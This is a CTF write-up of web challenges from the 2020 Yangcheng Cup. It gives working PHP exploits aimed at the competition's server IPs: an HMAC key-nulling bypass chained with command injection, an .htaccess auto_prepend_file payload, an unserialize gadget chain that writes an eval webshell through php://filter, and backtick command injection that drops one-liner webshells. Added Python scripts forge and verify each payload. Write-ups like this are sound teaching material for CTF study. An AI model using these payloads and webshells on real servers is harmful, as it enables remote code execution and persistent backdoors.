2020 Yangcheng Cup (羊城杯) Cyber Security Competition

2020-09-11

easycon


After connecting with AntSword (蚁剑), the file bbbbbbbbb.txt turns up. Base64-decode it and save the result as an image to see the flag.

import base64

# bbbbbbbbb.txt holds the base64 text of an image; decode it back into a binary file
with open('bbbbbbbbb.txt', 'r') as f:
    s = f.read()

# the output is the image itself; rename 1.txt to .png/.jpg to open it
with open('1.txt', 'wb') as f2:
    f2.write(base64.b64decode(s))

BlackCat


The source is exposed at

view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3

and reads:

<?php
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('谁!竟敢踩我一只耳的尾巴!');   // "Who dares step on One-ear's tail!"
}

$clandestine = getenv("clandestine");   // server-side secret, never shown to the client

// Optional step: the key is re-derived from attacker-controlled data.
// On PHP 7 hash_hmac() only warns and returns NULL when White-cat-monitor is an array.
if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


// A NULL key is coerced to "", so the expected tag becomes computable without the secret.
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');   // HMAC mismatch
}

// One-ear is concatenated straight into a shell command: command injection once the tag checks out.
echo exec("nc".$_POST['One-ear']);

The original challenge is at:

https://neversecure.ca/category/bug-hunting/

exp

The weak spot is the optional White-cat-monitor branch. If that parameter arrives as an array, hash_hmac() on PHP 7 emits a warning and returns NULL instead of a digest (PHP 8 throws a TypeError, so this only works on 7.x). $clandestine becomes NULL, which the second hash_hmac() coerces to an empty-string key, so the expected Black-Cat-Sheriff is simply HMAC-SHA256 with key "" over One-ear, which the attacker can compute. The parameter has to be posted as an array, i.e. White-cat-monitor[]=, not the literal string "[]" (a string would just be HMACed with the real secret). One-ear starts with ";" so that exec("nc".$_POST['One-ear']) runs nc;cat flag.php.

http://183.129.189.60:10022/
# POST body
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat+flag.php&White-cat-monitor[]=
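To make the key-nulling concrete, here is an added Python model (not the author's exploit and not the challenge's code) of the PHP 7 behaviour the trick depends on, the server's check, and a forger that builds the POST body. The secret passed to server_accepts() is a placeholder: the point is that the forged body passes whatever it is.

```python
import hashlib
import hmac
from typing import Optional
from urllib.parse import quote_plus


def php7_hash_hmac(data, key: Optional[str]) -> Optional[str]:
    """Model of PHP 7's hash_hmac('sha256', $data, $key) for the two behaviours
    the exploit relies on:
      - a non-string $data (an array) only raises a warning; the call returns NULL
      - a NULL $key is coerced to the empty string
    PHP 8 throws a TypeError for the array case, which closes this hole."""
    if not isinstance(data, str):
        return None
    return hmac.new((key or "").encode(), data.encode(), hashlib.sha256).hexdigest()


def server_accepts(post: dict, clandestine: str) -> bool:
    """The challenge's check, with the server-side secret supplied by the caller."""
    if not post.get("Black-Cat-Sheriff") or not post.get("One-ear"):
        return False                       # empty() on either field
    key = clandestine
    if "White-cat-monitor" in post:
        key = php7_hash_hmac(post["White-cat-monitor"], key)   # None if an array was posted
    return php7_hash_hmac(post["One-ear"], key) == post["Black-Cat-Sheriff"]


def forge(command: str) -> dict:
    """POST fields that pass without the secret. White-cat-monitor is sent as an
    array (White-cat-monitor[]= on the wire), so the key collapses to "" and the tag
    is plain HMAC-SHA256 with an empty key. The leading ';' terminates the 'nc'
    that exec() prepends, so the rest runs as a separate command."""
    one_ear = ";" + command
    return {
        "Black-Cat-Sheriff": hmac.new(b"", one_ear.encode(), hashlib.sha256).hexdigest(),
        "One-ear": one_ear,
        "White-cat-monitor": [],
    }


def to_wire(body: dict) -> str:
    """application/x-www-form-urlencoded body; list values become name[]= pairs,
    which is what makes PHP build an array instead of a string."""
    parts = []
    for name, value in body.items():
        if isinstance(value, list):
            parts.extend(f"{quote_plus(name)}[]={quote_plus(v)}" for v in (value or [""]))
        else:
            parts.append(f"{quote_plus(name)}={quote_plus(value)}")
    return "&".join(parts)


if __name__ == "__main__":
    body = forge("cat flag.php")
    print(to_wire(body))
    print("accepted without knowing the secret:", server_accepts(body, "hunter2"))
```

Dropping White-cat-monitor, or sending it as the string "[]", makes the same body fail, which is why the parameter must be an array.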

easyphp


Source:

 <?php
    $files = scandir('./');
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./');
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

The original challenge can be found online: X-NUCA'2019 Ezphp.

Background:

php.ini has two directives that require a file at the top and bottom of every page:

  • auto_prepend_file  loads a file before every page

  • auto_append_file   loads a file after every page

For example, a .htaccess containing

php_value auto_prepend_file .htaccess

makes PHP include .htaccess itself into every PHP page (Apache has to honour .htaccess for this, and mod_php reads php_value settings from it).

The stristr() blacklist ("file" is on it) is bypassed with a backslash: Apache's config reader joins a line that ends in a backslash with the next one, so "auto_prepend_fil\" followed by a newline and "e .htaccess" is read as auto_prepend_file .htaccess while the raw content never contains the word "file". "flag" is split the same way with PHP string concatenation, 'cat /f'.'lag'.

The "\nHello, world" that file_put_contents() appends would be an invalid directive, so the PHP line is prefixed with "#" (an Apache comment) and ended with a backslash, which pulls the appended line into that comment. PHP itself does not care about the "#": when .htaccess is prepended, the text outside <?php ... ?> is simply echoed and the tag is executed.

payload

?content=php_value auto_prepend_fil\%0Ae .htaccess%0A%23<?php system('cat /f'.'lag');?>\&filename=.htaccess
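As an added Python model (not the page's or the challenge's code), this reproduces the server's two checks and Apache's line-continuation rule: build_htaccess() yields the same .htaccess body as the payload above, and apache_logical_lines() shows what Apache reads after the server has appended "\nHello, world". The continuation logic is a simplified model of Apache's config reader, not a port of it.

```python
import re

# The two server-side checks from easyphp's index.php.
CONTENT_BLACKLIST = ("on", "html", "type", "flag", "upload", "file")   # stristr(): case-insensitive
FILENAME_RE = re.compile(r"[^a-z\.]")                                  # anything else is "Hacker"

BACKSLASH_NL = "\\\n"   # backslash at end of line: Apache joins it with the next line


def passes_blacklist(content: str) -> bool:
    low = content.lower()
    return not any(word in low for word in CONTENT_BLACKLIST)


def filename_allowed(filename: str) -> bool:
    return FILENAME_RE.search(filename) is None


def build_htaccess(php_arg: str = "'cat /f'.'lag'") -> str:
    """The .htaccess body behind the payload above: 'file' is split across a
    backslash-newline so the raw text never contains it, the PHP line is an Apache
    comment ('#') and ends in a backslash so the "\\nHello, world" the server appends
    is swallowed into that comment. 'flag' is split with PHP string concatenation."""
    return ("php_value auto_prepend_fil" + BACKSLASH_NL + "e .htaccess\n"
            "#<?php system(" + php_arg + ");?>\\")


def server_writes(content: str) -> str:
    """What file_put_contents() actually stores."""
    return content + "\nHello, world"


def apache_logical_lines(text: str) -> list:
    """Join physical lines the way Apache reads a config file: a trailing backslash
    continues the directive on the next line (continuation is handled before comments)."""
    out, pending = [], ""
    for line in text.split("\n"):
        if line.endswith("\\"):
            pending += line[:-1]
            continue
        out.append(pending + line)
        pending = ""
    if pending:
        out.append(pending)
    return out


if __name__ == "__main__":
    content = build_htaccess()
    print("passes blacklist:", passes_blacklist(content), "filename ok:", filename_allowed(".htaccess"))
    for directive in apache_logical_lines(server_writes(content)):
        print(directive)
```

The joined lines come out as one valid php_value directive followed by one comment line that has absorbed "Hello, world", which is exactly why Apache accepts the file while the blacklist never sees "file" or "flag".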

easyser


First check robots.txt, which hints Disallow: /star1.php/. The page source contains:

 <!--  小胖说用个不安全的协议从我家才能进ser.php呢  !-->

("Xiaopang says ser.php can only be entered from my home over an insecure protocol.") The insecure protocol is plain http and "my home" is the loopback address, so request ser.php through star1.php's path parameter from 127.0.0.1:

http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php

Because REMOTE_ADDR is now 127.0.0.1, highlight_file() dumps the source:

<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} 
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;

    }
    public function hasaki(){
        $d   = '<?php die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}
?> 

Clearly file_put_contents() is where a shell gets written, but the content is prefixed with a die() stub, so the job is to build a chain that neutralises it. The stub is removed with a php://filter write chain: string.strip_tags strips the <?php die("nononon");?> tag, and convert.base64-decode then turns the remaining text (the base64-encoded shell) into PHP code. The trigger is GWHT::__toString(), yet nothing in the visible code calls it; my blind guess is that the entry point is an echo unserialize() on a parameter. The chain:

<?php
// Requires the GWHT and Yongen class definitions from ser.php above.
// Chain: echo -> GWHT::__toString() -> Yongen::hasaki() -> file_put_contents() through the filter.
$GWHT = new GWHT();
$GWHT->hero = new Yongen();
// string.strip_tags drops the prepended die() tag, convert.base64-decode restores the shell
$GWHT->hero->file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';
$GWHT->hero->text = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=='; // base64 of <?php eval($_POST['cmd']);?>
$a = serialize($GWHT);
echo $a;

payload

http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:77:"php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";s:4:"text";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==";}}
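As an added example (not the author's generator), the same payload built in Python without a PHP interpreter, plus a simplified model of what the two write filters do to the prefixed content. The strip_tags emulation is a regex stand-in for PHP's function and only covers the single tag this chain has to remove.

```python
import base64
import re

# Write filter used by the chain: drop the die() tag, then base64-decode what is left.
WRITE_FILTER = "php://filter/write=string.strip_tags|convert.base64-decode/resource="
DIE_PREFIX = '<?php die("nononon");?>'          # what Yongen::hasaki() prepends


def php_str(s: str) -> str:
    """serialize() of a PHP string: s:<byte length>:"<bytes>";"""
    return f's:{len(s.encode())}:"{s}";'


def php_obj(cls: str, props: dict) -> str:
    """serialize() of an object with public properties; values are already serialized."""
    body = "".join(php_str(name) + value for name, value in props.items())
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def build_chain(shell_php: str = "<?php eval($_POST['cmd']);?>", target: str = "shell.php") -> str:
    """GWHT -> hero = Yongen(file=<write filter>, text=base64(shell)), as in the PHP generator above."""
    text = base64.b64encode(shell_php.encode()).decode()
    yongen = php_obj("Yongen", {"file": php_str(WRITE_FILTER + target), "text": php_str(text)})
    return php_obj("GWHT", {"hero": yongen})


def emulate_filtered_write(data: str) -> str:
    """Simplified model of the two filters: string.strip_tags removes <...> tags
    (including the <?php ... ?> die() stub), then convert.base64-decode decodes the rest."""
    stripped = re.sub(r"<[^>]*>", "", data)
    return base64.b64decode(stripped).decode()


if __name__ == "__main__":
    print(build_chain())
    # what actually lands in shell.php
    print(emulate_filtered_write(DIE_PREFIX + base64.b64encode(b"<?php eval($_POST['cmd']);?>").decode()))
```

Because the base64 alphabet contains no angle brackets, strip_tags can only ever remove the die() stub, and the decoder then sees clean base64.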

Connect with AntSword; the flag is at /ffflag in the filesystem root.

AntSword connection: http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/shell.php, password cmd

Easyphp2


First read the source with the php://filter pseudo-protocol (the second URL spells base64 with double URL-encoding, %2562%2561%2573%2565%2536%2534):

http://183.129.189.60:10025/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
http://183.129.189.60:10025/?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php

Source:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>count is here</title>

    <style>

        html,
        body {
            overflow: none;
            max-height: 100vh;
        }
    </style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

    <?php
    ini_set('max_execution_time', 5);

    if ($_COOKIE['pass'] !== getenv('PASS')) {
        setcookie('pass', 'PASS');
        die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
    }
    ?>

    <h1>A Counter is here, but it has someting wrong</h1>

    <form>
        <input type="hidden" value="GWHT.php" name="file">
        <textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
        <input type="submit">
    </form>

    <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
            die('hacker!');
        }
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>

</body>
</html>

count is spliced into a single-quoted printf argument, so a single quote closes it and a backtick substitution inside runs a command (";" is blacklisted, backticks are not):

http://183.129.189.60:10025/?file=GWHT.php&count='`ls > 1.txt`'

Background:

The webshell is written through the shell, and inside the backticks $_GET or $_POST would be expanded as (undefined, hence empty) shell variables before PHP ever saw them, so the shell is written with get_defined_vars() instead of a superglobal.

Dumping get_defined_vars() gives:

array(4) { ["_GET"]=> array(0) { } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["pass"]=> string(4) "PASS" } ["_FILES"]=> array(0) { } } 

The outermost value is an array whose first element is _GET, so wrapping the call in two pos() calls (pos() is an alias of current()) yields the first value of $_GET. The line below is therefore a one-liner webshell that evaluates whatever is passed in the first GET parameter:

eval(pos(pos(get_defined_vars())));

payload

http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(pos(get_defined_vars())))?>">1.php`'

Then use it to drop a POST-based webshell:

http://183.129.189.60:10021/1.php?a=file_put_contents('kkk.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=='));

Alternatively, next() moves from _GET to _POST, so eval(pos(next(get_defined_vars()))) takes the first POST value and AntSword can connect directly:

http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(next(get_defined_vars())))?>">1.php`'
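As an added example (not the author's code), this Python script reproduces the shell line GWHT.php builds and runs it locally against a temporary file, showing both halves of the trick: the backtick injection slips past the count blacklist, and a naive <?=eval($_GET[1])?> shell arrives mangled because the shell expands $_GET before PHP ever sees it, while the get_defined_vars() form is written verbatim. It assumes a POSIX sh is installed; the temp directory stands in for the web root.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Filter and shell line from GWHT.php, reproduced so the injection can be tested offline.
COUNT_BLACKLIST = re.compile(r";|base64|rot13|base32|base16|<\?php|#", re.I)


def server_shell_line(count: str) -> str:
    """exec('printf \\'' . $count . '\\' | wc -c'): count lands inside single quotes."""
    return "printf '" + count + "' | wc -c"


def passes_filter(count: str) -> bool:
    return COUNT_BLACKLIST.search(count) is None


def inject(shell_cmd: str) -> str:
    """Close the single quote, run shell_cmd via backticks (not blacklisted, unlike ';'),
    then reopen the quote so printf still gets a well-formed argument."""
    return "'`" + shell_cmd + "`'"


def drop_file(php: str, target: Path) -> str:
    """Push an 'echo ... > target' through the same shell line the server runs and
    return what was actually written. Runs sh locally; target is a temp file
    standing in for the web root."""
    count = inject(f'echo "{php}">{target}')
    if not passes_filter(count):
        raise ValueError("blocked by the count filter")
    subprocess.run(["sh", "-c", server_shell_line(count)], check=True, capture_output=True)
    return target.read_text().strip()


def demo() -> dict:
    """Why the writeup uses get_defined_vars(): inside the backticks the shell expands
    $_GET to an empty string, so a <?=eval($_GET[1])?> shell arrives mangled, while
    the superglobal-free form is written verbatim."""
    with tempfile.TemporaryDirectory() as d:
        naive = drop_file("<?=eval($_GET[1])?>", Path(d) / "naive.php")
        robust = drop_file("<?=eval(pos(pos(get_defined_vars())))?>", Path(d) / "1.php")
    return {"naive": naive, "robust": robust}


if __name__ == "__main__":
    for name, content in demo().items():
        print(f"{name}: {content}")
```

<?= is used instead of <?php because the latter is on the blacklist; the same regex is what rules out ";" as a command separator and pushes the payload toward backticks.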

BreakTheWall


Source:

 <?php
error_reporting(0);
if(isset($_GET['c'])) {
  eval($_GET['c']);
}else {
  highlight_file(__FILE__);
}


